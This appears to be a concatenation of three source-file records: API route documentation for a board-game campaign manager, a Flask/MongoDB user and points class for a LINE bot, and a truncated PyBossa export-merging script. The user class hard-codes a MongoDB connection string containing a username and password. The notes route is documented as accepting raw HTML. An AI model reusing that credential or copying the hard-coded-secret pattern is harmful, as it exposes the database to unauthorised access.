<p>Use this method to update the Settlement sheet's <code>nemesis_encounters</code>
dictionary, i.e. to indicate that a nemesis encounter has occurred.</p>
<p>A typical dictionary might look like this:</p>
<code> "nemesis_encounters": {"slenderman": [], "butcher": [1,2]}</code>
<p>In this example, the settlement has (somehow) encountered a
a level 1 Butcher, but has not yet encountered a Slenderman.</p>
<p>To update the dictionary, <b>POST</b> some JSON that includes the
nemesis monster's handle and the levels that are complete.</p>
<p><b>POST</b> this JSON to reset/undo/remove Butcher encounters:<p>
<code>{"handle": "butcher", "levels": []}</code>
<p><b>POST</b> this JSON to record an encounter with a level 1 Manhunter:</p>
<code>{"handle": "manhunter", "levels": [1]}</code>
""",
},
"settlement_add_milestone_settlement_id": {
"name": "/settlement/add_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code>
to this route to add it to the settlement's list of milestones:</p>
<code>{handle: 'game_over'}</code>
<p>...or...</p>
<code>{handle: 'innovations_5'}</code>
<p>This endpoint will gracefully fail and politely ignore dupes.</p>
""",
},
"settlement_rm_milestone_settlement_id": {
"name": "/settlement/rm_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code> to this
route to remove it from the settlement's list of milestones:</p>
<code>{handle: 'pop_15'}</code>
<p>...or...</p>
<code>{handle: 'first_death'}</code>
<p>This endpoint will gracefully fail and politely ignore attempts to remove
handles that are not present.</p>
""",
},
"settlement_set_principle_settlement_id": {
"name": "/settlement/set_principle/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> some JSON to this route to set or unset a settlement principle.
Request the handle of the <code>principle</code> and the election you want to
make:</p>
<pre><code>
{
principle: 'conviction',
election: 'romantic',
}</code></pre>
<p>This route has a couple of unusual behaviors to note:</p>
<ul>
<li>It requires both keys (i.e. you will get a 400 back if you
<b>POST</b> any JSON that does not include both).</li>
<li>It will accept a Boolean for 'election', because this is how
you 'un-set' a principle.</li>
</ul>
<p> To un-set a principle, simply post the principle handle and set the
<code>election</code> key to 'false':</p>
<code>{principle: 'new_life', election: false}</code>
<p> <b>Important!</b> Adding principles to (or removing them from) a
settlement automatically modifies all current survivors, in many
cases. If you've got survivor info up on the screen when you set a principle,
be sure to refresh any survivor info after <b>POST</b>ing JSON to this route!
</p>\
""",
},
#
# location controls
#
"settlement_add_location_settlement_id": {
"name": "/settlement/add_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p> <b>POST</b> a location <code>handle</code> to this route to add
it to the settlement's Locations:</p>
<code>{'handle': 'bone_smith'}</code>
""",
},
"settlement_rm_location_settlement_id": {
"name": "/settlement/rm_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>This is basically the reverse of <code>add_location</code>
and works nearly identically. <b>POST</b> a JSON representation of a
Location handle to remove it from the settlement's list:</p>
<code>{'handle': 'barber_surgeon'}</code>
""",
},
"settlement_set_location_level_settlement_id": {
"name": "/settlement/set_location_level/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>For Locations that have a level (e.g. the People of the
Sun's 'Sacred Pool'), you may set the Location's level by posting
the <code>handle</code> of the location and the desired level:</p>
<code>{'handle': 'sacred_pool', 'level': 2}</code>
""",
},
#
# innovation controls
#
"settlement_get_innovation_deck_settlement_id": {
"name": "/settlement/get_innovation_deck/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>Retrieve the settlement's current innovation deck as an array of asset names
by default.</p>
<p>Alternately, you can <b>POST</b> the parameter
<code>return_type: "dict"</code> to this endpoint to get a hash of innovations
(representing the settlement's Innovation Deck) back from this endpoint.</p>
<p>In the hash, innovation assets are sorted by their name (i.e. <i>not</i>
by their handle):<p>
<pre><code>{
"albedo": {
"handle": "albedo",
"name": "Albedo",
"consequences": [
"citrinitas"
],
"endeavors": [
"gorm_albedo"
],
"expansion": "gorm",
"type_pretty": "Innovations",
"sub_type_pretty": "Expansion",
"type": "innovations",
"sub_type": "expansion",
"innovation_type": "science"
},
"bed": {
"handle": "bed",
"name": "Bed",
"type": "innovations",
"endeavors": [
"bed_rest"
],
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "home"
},
...
"symposium": {
"handle": "symposium",
"name": "Symposium",
"consequences": [
"nightmare_training",
"storytelling"
],
"type": "innovations",
"settlement_buff": "When a survivor innovates, draw an additional 2 Innovation Cards to choose from.",
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "education"
}
}
</code></pre>
""",
},
"settlement_add_innovation_settlement_id": {
"name": "/settlement/add_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p> <b>POST</b> an Innovation <code>handle</code> to this route to add
it to the settlement's Innovations:</p>
<code>{'handle': 'hovel'}</code>
<p>...or:</p><code>{'handle': 'mastery_club'}</code>
<p><b>Important!</b> As far as the API is concerned, Principles (e.g.
'Graves', 'Survival of the Fittest', etc. <u>are not innovations</u>
and you <u>will</u> break the website if you try to add a principle
as if it were an innovation.</p>
<p>Use <code>set_principle</code> (below) instead.</p>
""",
},
"settlement_rm_innovation_settlement_id": {
"name": "/settlement/rm_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>This is basically the reverse of <code>add_innovation</code>
and works nearly identically. <b>POST</b> a JSON representation of an
Innovation handle to remove it from the settlement's list:</p>
<code>{'handle': 'mastery_club'}</code>
""",
},
"settlement_set_innovation_level_settlement_id": {
"name": "/settlement/set_innovation_level/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>For Innovations that have a level (e.g. the Slenderman's 'Dark
Water Research'), you may set the Innovation's level by posting
the <code>handle</code> of the innovation and the level:</p>
<code>{'handle': 'dark_water_research', 'level': 2}</code>
""",
},
#
# timeline!
#
"settlement_get_timeline_settlement_id": {
"name": "/settlement/get_timeline/<settlement_id>",
"subsection": "settlement_manage_timeline",
"methods": ['GET'],
"desc": """\
<p>Hit this endpoint to get a JSON representation of the
settlement's timeline.</p>
<p>This is read-only and optimized for performance, so you'll
get a timeline MUCH faster using this route than one of the
routes that pulls down the whole settlement.</p>
""",
},
"settlement_add_lantern_years_settlement_id": {
"name": "/settlement/add_lantern_years/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p><b>POST</b> a number (int) of years to add to the settlement's
Timeline:</p>
<code>{years: 5}</code>
<p><b>NB:</b> Timelines are capped at 50 LYs. If you try to add
a number of years that would take you above 50 LYs, you'll get a
400 back.</p>
""",
},
"settlement_replace_lantern_year_settlement_id": {
"name": "/settlement/replace_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>This is the preferred route for adding or removing events
from a Lantern year. It basically requires <b>POST</b>ing an
entire Lantern Year to the API, so be sure to understand the
<a href="#timelineDataModel">timeline data model</a> before
attempting to use this one.</p>
<p>Since a Lantern year is a hash of hashes, replacing one is
as simple as <b>POST</b>ing that hash to this route. To "blank
out" or remove all events from an LY, for example, you would
simply send a <b>POST</b> body like this:</p>
<code>{ly: {year: 5}}</code>
<p>Similarly, to add events to that LY, you could <b>POST</b>
something like this:</p>
            <code>{ly: {year: 5, settlement_event: [{handle: 'core_open_maw'}, {handle: 'core_clinging_mist'}]}}</code>
<p>Finally, as the name suggests, this is an overwrite/replace
type method, and it does not do any "checks" or comparisons
between the data in the API and your incoming LY.</p>
<p>The best practice here, from a design standpoint, is to pull
down the settlement's timeline (e.g. using <code>get_timeline</code>
(above), let the user modify an individual LY as necessary, and
then to <b>POST</b> their modified LY back, in its entirety, to
this endpoint.</p>
""",
},
"settlement_set_current_lantern_year_settlement_id": {
"name": "/settlement/set_current_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>To set the settlement's current LY, <b>POST</b> an int to this
endpoint:</p>
<code>{ly: 3}</code>
""",
},
#
# settlement admins
#
"settlement_add_admin_settlement_id": {
"name": "/settlement/add_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the email address of a registered user to add them to the
list of settlement administrators:</p>
<code>{login: 'demo@kdm-manager.com'}</code>
<p>Disclaimers:<ul><li>This will fail gracefully if the user's
email is in the list (so feel free to spam it).</li><li>This will
fail loudly if the email address does not belong to a registered
user: you'll get a 400 and a nasty message back.</li></ul>
</p>
""",
},
"settlement_rm_admin_settlement_id": {
"name": "/settlement/rm_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>This is the reverse of the <code>add_admin</code> route.</p>
<p>Basically, you <b>POST</b> some JSON to the route including the email
of the user you want to remove from the settlement admins list:</p>
<code>{login: 'demo@kdm-manager.com'}</code>
<p>Like the <code>add_admin</code> route, this one fails gracefully
if you try to remove someone who isn't on the list, etc.</p>
""",
},
#
# settlement notes
#
"settlement_add_note_settlement_id": {
"name": "/settlement/add_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Since any player in a game is allowed to create settlement
notes, the JSON required by this endpoint must include a user's
OID.</p>
<p>This endpoint supports the following key/value pairs:</p>
<table class="embedded_table">
<tr><th>key</th><th><b>R</b>/O</th><th>value</th></tr>
<tr>
<td class="small_key">author_id</td>
<td class="type"><b>R</b></type>
<td class="value">The creator's OID as a string.</td>
</tr>
<tr>
<td class="small_key">note</td>
<td class="type"><b>R</b></type>
<td class="value">The note as a string. We accept HTML here, so if you want to display this back to your users as HTML, you can do that.</td>
</tr>
<tr>
<td class="small_key">author</td>
<td class="type">O</type>
<td class="value">The creator's login, e.g. <code>demo@kdm-manager.com</code>, as a string. Best practice is to NOT include this, unless you really know what you're doing.</td>
</tr>
<tr>
<td class="small_key">lantern_year</td>
<td class="type">O</type>
<td class="value">The Lantern Year the note was created. Defaults to the current LY if not specified.</td>
</tr>
</table>
<p>For example, to add a new note to a settlement, your <b>POST</b>
body will, at a minimum, look something like this:</p>
<code>{author_id: "5a26eb1a4af5ca786d1ed548", note: "Nobody expects the Spanish Inquisition!"}</code>
<p><b>Important!</b> This route returns the OID of the
newly-created note:</p>
<code>{"note_oid": {"$oid": "5a2812d94af5ca03ef7db6c6"}}</code>
<p>...which can then be used to remove the note, if necessary
(see <code>rm_note</code> below).</p>
""",
},
"settlement_rm_note_settlement_id": {
"name": "/settlement/rm_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the OID of a settlement note to remove it.</p>
<code>{_id: "5a26eb894af5ca786d1ed558"}</code>
<p>As long as you get a 200 back from this one, the note has
been removed. If you get a non-200 status (literally anything other
than a 200), something went wrong. </p>
""",
},
}
| [
"toconnell@tyrannybelle.com"
] | toconnell@tyrannybelle.com |
1aae5ab705875a61c1ac256f801c34bf867ac8a3 | 35fc464a495aef8ea4f80e85034c74f4f6dd6d60 | /Flask-3/wwwroot/data_model/user.py | d4987682e85410ed2fad54c7d81501e8b94b3a6c | [
"BSD-3-Clause"
] | permissive | yuu045-ran/Azure-Linux-Samples | be64b3ccafd316685147f985dae36bee4de816e4 | 29897b1ad6902e97d069e067d00b5938eced4740 | refs/heads/master | 2022-05-24T21:27:25.809023 | 2020-05-03T13:59:34 | 2020-05-03T13:59:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | #coding=utf-8
from flask import Flask, jsonify, request, render_template,session
import pymongo
import pandas as pd
import datetime
import time
import numpy as np
# Model
from data_model.manager import *
from data_model.channel import *
from data_model.webhook import *
from data_model.user import *
from data_model.tags import *
# line bot 相關元件
from linebot import LineBotApi
from linebot.models import *
from linebot.exceptions import LineBotApiError
class User:
    """Data-access object for LINE-bot end users stored in MongoDB.

    A user is identified everywhere by the (user_id, channel_id) pair.
    Wraps three collections of the ``ufs`` database:

    * ``users``      - main user documents (profile, point balance, tags)
    * ``point_logs`` - one document per point transaction
    * ``user_log``   - free-form activity log entries
    """

    def __init__(self):
        # SECURITY NOTE(review): database credentials are hard-coded in the
        # connection string - they should be moved to configuration or an
        # environment variable, and this string rotated.
        self.client = pymongo.MongoClient("mongodb://james:wolf0719@cluster0-shard-00-01-oiynz.azure.mongodb.net:27017/?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority")
        self.col_user = self.client.ufs.users
        self.col_point_logs = self.client.ufs.point_logs
        self.col_user_log = self.client.ufs.user_log

    def get_once(self, user_id, channel_id):
        """Return the user document for (user_id, channel_id), without ``_id``.

        NOTE(review): ``find_one`` returns None for a missing user, so this
        raises TypeError on the ``del`` below - callers are expected to call
        ``chk_once`` / ``add_once`` first.
        """
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        userdata = self.col_user.find_one(find)
        del userdata["_id"]  # ObjectId is not JSON-serializable
        return userdata

    def chk_once(self, user_id, channel_id):
        """Return True if a user document exists for (user_id, channel_id)."""
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        # NOTE(review): Cursor.count() is deprecated since pymongo 3.7 and
        # removed in 4.x; kept here for compatibility with the pinned driver.
        cursor = self.col_user.find(find)
        return cursor.count() != 0

    def add_once(self, user_id, channel_id):
        """Insert a new user document seeded with the LINE profile data."""
        jsondata = {
            "user_id": user_id,
            "channel_id": channel_id,
            "point": 0,
            "created_datetime": datetime.datetime.now(),
            "last_datetime": datetime.datetime.now()
        }
        # Resolve the channel's access token so the LINE API can be queried.
        channel = Channel()
        channel_info = channel.get_channel(channel_id)
        channel_access_token = channel_info['channel_access_token']
        line_bot_api = LineBotApi(channel_access_token)
        profile = line_bot_api.get_profile(user_id)
        jsondata['name'] = profile.display_name
        jsondata['avator'] = profile.picture_url  # (sic) field name kept for schema compatibility
        jsondata['status_message'] = profile.status_message
        self.col_user.insert_one(jsondata)
        # Record the account creation in the activity log.
        User().set_user_log(user_id, channel_id, "新增帳號")
        return True

    def update_user_main(self, user_id, channel_id, data):
        """Merge *data* into the user's main document (``$set`` semantics).

        NOTE(review): mutates the caller's ``data`` dict by adding
        ``last_datetime``.
        """
        find = {
            "user_id": user_id,
            "channel_id": channel_id,
        }
        data["last_datetime"] = datetime.datetime.now()
        self.col_user.update_one(find, {"$set": data})
        return True

    def set_user_tag(self, user_id, channel_id, tag):
        """Append *tag* to the user's tag history and trigger any tag actions.

        :param tag: the tag name as a string
        """
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        # BUGFIX: the original reassigned ``tag`` to this dict, so every later
        # use of ``tag`` (the activity log and all Tags() lookups below)
        # received the dict instead of the tag string.
        tag_entry = {
            "tag": tag,
            "date": datetime.datetime.now()
        }
        self.col_user.update_one(find, {"$push": {"tags": tag_entry}})
        # Touch the last-activity timestamp and write an activity log entry.
        self.col_user.update_one(find, {"$set": {"last_datetime": datetime.datetime.now()}})
        User().set_user_log(user_id, channel_id, "設定 Tag:{}".format(tag))
        tags = Tags()
        # Only act on tags that are registered for this channel, and only
        # while the per-user quota for the tag has not been exhausted.
        if tags.chk_once(channel_id, tag) == True:
            tag_limit = tags.chk_limit(channel_id, user_id, tag)
            if tag_limit == True:
                tags.do_tag_act(channel_id, user_id, tag)
                tags.set_tag_log(channel_id, user_id, tag)
        return True

    def get_user_tags(self, user_id, channel_id):
        """Return the distinct tag strings ever assigned to the user."""
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        user_data = self.col_user.find_one(find)
        res = []
        if "tags" in user_data:
            for entry in user_data["tags"]:
                if entry['tag'] not in res:
                    res.append(entry['tag'])
        return res

    def get_all_users(self, channel_id):
        """Return every user document for *channel_id* (without ``_id``)."""
        find = {
            "channel_id": channel_id
        }
        datalist = []
        for d in self.col_user.find(find):
            del d["_id"]
            datalist.append(d)
        return datalist

    # ========================================================================
    #
    # Point management
    #
    # ========================================================================

    def add_point(self, user_id, channel_id, point, point_note):
        """Credit *point* points to the user and log the transaction.

        :param point: number of points to add (int)
        :param point_note: human-readable reason, stored in the log
        :return: the user's new point balance
        """
        user_data = User.get_once(self, user_id, channel_id)
        old_point = user_data.get('point', 0)  # legacy documents may lack 'point'
        new_point = int(old_point) + int(point)
        # Write the transaction log first ...
        log_data = {
            "user_id": user_id,
            "channel_id": channel_id,
            'original': old_point,
            "point": point,
            "act": "add",
            "update_datetime": datetime.datetime.now(),
            "balance_point": new_point,
            "point_note": point_note
        }
        self.col_point_logs.insert_one(log_data)
        # ... then persist the new balance on the main document.
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        self.col_user.update_one(find, {"$set": {"point": new_point}})
        # Touch the last-activity timestamp and record an activity log entry.
        self.col_user.update_one(find, {"$set": {"last_datetime": datetime.datetime.now()}})
        log = "新增點數({0}):{1}".format(point_note, point)
        User().set_user_log(user_id, channel_id, log)
        return new_point

    def deduct_point(self, user_id, channel_id, point, point_note):
        """Debit *point* points from the user and log the transaction.

        The balance may go negative; no floor is enforced here.

        :return: the user's new point balance
        """
        user_data = User.get_once(self, user_id, channel_id)
        old_point = user_data['point']
        new_point = old_point - point
        log_data = {
            "user_id": user_id,
            "channel_id": channel_id,
            'original': old_point,
            "point": point,
            "act": "deduct",
            "update_datetime": datetime.datetime.now(),
            "balance_point": new_point,
            "point_note": point_note
        }
        self.col_point_logs.insert_one(log_data)
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        self.col_user.update_one(find, {"$set": {"point": new_point}})
        # BUGFIX: the original built the last_datetime update but never sent
        # it to MongoDB, so deductions did not refresh the activity time.
        self.col_user.update_one(find, {"$set": {"last_datetime": datetime.datetime.now()}})
        log = "扣除點數({0}):{1}".format(point_note, point)
        User().set_user_log(user_id, channel_id, log)
        return new_point

    def get_point_logs(self, user_id, channel_id):
        """Return the user's point transactions, newest first."""
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        logs_data = self.col_point_logs.find(find).sort("update_datetime", -1)
        datalist = []
        for row in logs_data:
            del row["_id"]
            datalist.append(row)
        return datalist

    def lifetime_record(self, user_id, channel_id):
        """Return the lifetime total of points ever credited to the user."""
        find = {
            "user_id": user_id,
            "channel_id": channel_id,
            "act": "add"
        }
        pipeline = [
            {'$match': find},
            {'$group': {'_id': "$user_id", 'point': {'$sum': '$point'}}},
        ]
        if self.col_point_logs.find(find).count() == 0:
            return 0
        # The $group stage yields exactly one document for this user.
        for data in self.col_point_logs.aggregate(pipeline):
            print(data)  # debug output kept from the original implementation
            return data['point']

    def set_user_log(self, user_id, channel_id, log_msg):
        """Append a free-form entry to the user activity log."""
        log_data = {}
        log_data['log_note'] = log_msg
        log_data['datetime'] = datetime.datetime.now()
        log_data['user_id'] = user_id
        log_data['channel_id'] = channel_id
        self.col_user_log.insert_one(log_data)
        return True

    def get_user_log(self, user_id, channel_id):
        """Return the user's activity log entries, newest first."""
        find = {
            "user_id": user_id,
            "channel_id": channel_id
        }
        logs_data = self.col_user_log.find(find).sort("datetime", -1)
        datalist = []
        for row in logs_data:
            del row["_id"]
            datalist.append(row)
        return datalist
| [
"39946188+shengdamao@users.noreply.github.com"
] | 39946188+shengdamao@users.noreply.github.com |
11dab269946bcb383552e513d1c5b90dd10c2af2 | 2a56d481855e3621f2c7ffce455bb76f79e6cbea | /bin/mergeExport.py | d0a339644dddbd1941fbce1dfa3a5501a2f8be1c | [
"BSD-3-Clause"
] | permissive | SkyTruth/CrowdProjects | 26ad6bec809f068f8fca032f22e1a8d6982b21b7 | eede4c97ca5195d8ad39ce353c962f588e52c6ad | refs/heads/master | 2021-01-23T06:29:08.526153 | 2016-12-20T17:45:58 | 2016-12-20T17:45:58 | 18,370,679 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,431 | py | #!/usr/bin/env python
# This document is part of CrowdTools
# https://github.com/SkyTruth/CrowdTools
# =================================================================================== #
#
# New BSD License
#
# Copyright (c) 2014, SkyTruth, Kevin D. Wurster
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# =================================================================================== #
"""
Combine the contents of PyBossa's exported task.json and task_run.json
"""
import os
import sys
import json
from os.path import *
#/* ======================================================================= */#
#/* File Specific Information
#/* ======================================================================= */#
__docname__ = basename(__file__)
__all__ = ['print_usage', 'print_help', 'print_license', 'print_help_info', 'print_version', 'get_task',
'adjust_fields', 'main']
#/* ======================================================================= */#
#/* Build Information
#/* ======================================================================= */#
__version__ = '0.1-dev'
__release__ = '2014-06-23'
__copyright__ = 'Copyright 2014, SkyTruth'
__author__ = 'Kevin Wurster'
__license__ = '''
New BSD License
Copyright (c) 2014, Kevin D. Wurster
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* The names of its contributors may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
#/* ======================================================================= */#
#/* Define print_usage() function
#/* ======================================================================= */#
def print_usage():
    """Print the command line usage summary.

    :return: 1, suitable for passing straight to ``sys.exit()``
    :rtype: int
    """
    usage_text = """
Usage:
%(name)s --help-info
%(name)s [options] task.json task_run.json outfile.json
Options:
--overwrite Overwrite output file
--prefix=str Prefix for all task fields
[default: _t_]
""" % {'name': __docname__}
    print(usage_text)
    return 1
#/* ======================================================================= */#
#/* Define print_help() function
#/* ======================================================================= */#
def print_help():
    """Print a more detailed description of this utility.

    :return: 1, suitable for passing straight to ``sys.exit()``
    :rtype: int
    """
    underline = '-' * len(__docname__)
    help_text = """
Help: %s
------%s
Loops through all task runs and appends the matching task's fields to the task
run. A string is prepended to all task fields in order to prevent overwriting
fields that exist in both the task and task run - this prefix can be set by the
user via the '--prefix=str' option.
""" % (__docname__, underline)
    print(help_text)
    return 1
#/* ======================================================================= */#
#/* Define print_license() function
#/* ======================================================================= */#
def print_license():
    """Print the module's license text.

    :return: 1, suitable for passing straight to ``sys.exit()``
    :rtype: int
    """
    # Equivalent to print(__license__): the license text plus one newline.
    sys.stdout.write(__license__ + "\n")
    return 1
#/* ======================================================================= */#
#/* Define print_help_info() function
#/* ======================================================================= */#
def print_help_info():
    """Print the list of help-related command line flags.

    :return: 1, suitable for passing straight to ``sys.exit()``
    :rtype: int
    """
    flags_text = """
Help Flags:
--help-info This printout
--help More detailed description of this utility
--usage Arguments, parameters, flags, options, etc.
--version Version and ownership information
--license License information
"""
    print(flags_text)
    return 1
#/* ======================================================================= */#
#/* Define print_version() function
#/* ======================================================================= */#
def print_version():
    """Print the module version, release date and copyright.

    :return: 1, suitable for passing straight to ``sys.exit()``
    :rtype: int
    """
    version_text = """
{0} version {1} - released {2}
{3}
""".format(__docname__, __version__, __release__, __copyright__)
    print(version_text)
    return 1
#/* ======================================================================= */#
#/* Define get_task()
#/* ======================================================================= */#
def get_task(task_id, tasks_object):
    """Look up the task whose ``id`` matches *task_id*.

    :param task_id: value of task_run.json['task_id']
    :type task_id: int
    :param tasks_object: parsed contents of task.json
    :type tasks_object: list
    :return: the matching task dict, or None when no task matches
    :rtype: dict|None
    """
    matches = (candidate for candidate in tasks_object if candidate['id'] == task_id)
    return next(matches, None)
#/* ======================================================================= */#
#/* Define adjust_fields()
#/* ======================================================================= */#
def adjust_fields(prefix, task):
    """Return a new dict with *prefix* prepended to every key of *task*.

    :param prefix: string prepended to task field names
    :type prefix: str
    :param task: a JSON task object from task.json
    :type task: dict
    :return: a fresh dict (the input *task* is left untouched)
    :rtype: dict
    """
    return {prefix + field: content for field, content in task.items()}
#/* ======================================================================= */#
#/* Define main()
#/* ======================================================================= */#
def main(args):
    """
    Commandline logic: merge task.json fields into their task runs.

    :param args: commandline arguments from sys.argv[1:]
    :type args: list|tuple
    :return: 0 on success and 1 on failure
    :rtype: int
    """

    #/* ======================================================================= */#
    #/*     Defaults
    #/* ======================================================================= */#

    overwrite_outfile = False   # allow clobbering an existing output file
    field_prefix = '_t_'        # prepended to every task field on merge

    #/* ======================================================================= */#
    #/*     Containers
    #/* ======================================================================= */#

    # Input/output files
    task_file = None
    task_run_file = None
    output_file = None

    # JSON objects
    tasks = None
    task_runs = None
    output_json = None

    #/* ======================================================================= */#
    #/*     Parse Arguments
    #/* ======================================================================= */#

    arg_error = False
    i = 0
    while i < len(args):
        try:
            arg = args[i]

            # Help arguments
            if arg in ('--help-info', '-help-info', '--helpinfo', '-help-info'):
                return print_help_info()
            elif arg in ('--help', '-help', '--h', '-h'):
                return print_help()
            elif arg in ('--usage', '-usage'):
                return print_usage()
            elif arg in ('--version', '-version'):
                return print_version()
            # BUGFIX: the short form here was '-usage', which duplicated the
            # usage flag above and made '-license' unreachable.
            elif arg in ('--license', '-license'):
                return print_license()

            # I/O options
            elif arg in ('--overwrite', '-overwrite'):
                i += 1
                overwrite_outfile = True

            # Processing options
            elif '-prefix=' in arg:
                i += 1
                field_prefix = arg.split('=', 1)[1]

            # Positional arguments and errors
            else:
                # Catch task.json
                if task_file is None:
                    i += 1
                    task_file = arg
                # Catch task_run.json
                elif task_run_file is None:
                    i += 1
                    task_run_file = arg
                # Catch output.json
                elif output_file is None:
                    i += 1
                    output_file = arg
                # Catch errors
                else:
                    i += 1
                    arg_error = True
                    print("ERROR: Invalid argument: %s" % str(arg))

        except IndexError:
            arg_error = True
            print("ERROR: An argument has invalid parameters")

    #/* ======================================================================= */#
    #/*     Validate configuration
    #/* ======================================================================= */#

    bail = False

    # Check arguments
    if arg_error:
        bail = True
        print("ERROR: Did not successfully parse arguments")

    # Check task.json file.  The if/elif chain guarantees os.access() is only
    # called on a real path (the original crashed on None and checked the
    # wrong variable's read permission).
    if task_file is None:
        bail = True
        print("ERROR: Need a task.json file")
    elif not isfile(task_file):
        bail = True
        print("ERROR: Can't find task.json file: %s" % task_file)
    # BUGFIX: this used to test task_run_file's permissions by mistake.
    elif not os.access(task_file, os.R_OK):
        bail = True
        print("ERROR: Need read permission: %s" % task_file)

    # Check task_run.json file
    if task_run_file is None:
        bail = True
        print("ERROR: Need a task_run.json file")
    elif not isfile(task_run_file):
        bail = True
        print("ERROR: Can't find task_run.json file: %s" % task_run_file)
    elif not os.access(task_run_file, os.R_OK):
        bail = True
        print("ERROR: Need read permission: %s" % task_run_file)

    # Check output file
    if output_file is None:
        bail = True
        print("ERROR: Need an output file")
    elif isfile(output_file) and not overwrite_outfile:
        bail = True
        print("ERROR: Output file exists and overwrite=%s: %s" % (str(overwrite_outfile), output_file))
    # BUGFIX: dirname() of a bare filename is '' - fall back to '.' so the
    # write-permission check tests the actual target directory.
    elif not os.access(dirname(output_file) or '.', os.W_OK):
        bail = True
        print("ERROR: Need write permission: %s" % dirname(output_file))

    # Processing options
    if field_prefix == '':
        bail = True
        print("ERROR: Field prefix cannot be an empty string - this will cause data to be overwritten")

    # Exit if necessary
    if bail:
        return 1

    #/* ======================================================================= */#
    #/*     Load data
    #/* ======================================================================= */#

    print("Loading data...")

    # Load task.json
    with open(task_file, 'r') as f:
        tasks = json.load(f)
    print(" Found %s tasks" % str(len(tasks)))

    # Load task_run.json
    with open(task_run_file, 'r') as f:
